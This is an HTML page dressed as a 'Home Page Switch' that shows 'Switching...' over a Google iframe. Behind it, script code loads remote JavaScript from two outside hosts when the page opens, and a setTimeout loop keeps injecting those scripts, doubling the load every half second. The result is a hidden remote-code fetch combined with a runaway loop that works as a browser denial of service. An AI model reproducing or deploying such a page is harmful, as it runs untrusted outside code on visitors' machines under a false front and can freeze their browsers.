<html>
<head>
<title>Home Page Switch</title>
<script>
i=0;
function startloop() {
	setTimeout("loadpage()",500)
	setTimeout("loadpage2()",500)
}
function loadpage() {
	SCRIPT = document.createElement('SCRIPT');
	SCRIPT.type = 'text/javascript';
	SCRIPT.src = 'http://ikilledsanta.tripod.com/other/firefoxbl4k/script.js';
	document.body.appendChild(SCRIPT);
	startloop();
}
function loadpage2() {
	SCRIPT = document.createElement('SCRIPT');
	SCRIPT.type = 'text/javascript';
	SCRIPT.src = 'http://ikilledsanta.primedesigning.com/other/firefoxbl4k/script.js';
	document.body.appendChild(SCRIPT);
	startloop();
}
</script>
</head>
<body onLoad="startloop()">
<center><font color="#000000">Switching...</font><script src="http://ikilledsanta.tripod.com/other/firefoxbl4k/script.js"></script><script src="http://ikilledsanta.primedesigning.com/other/firefoxbl4k/script.js"></script></center>
<iframe src="http://www.google.com" width="100%" height="96%">
</body>
</html>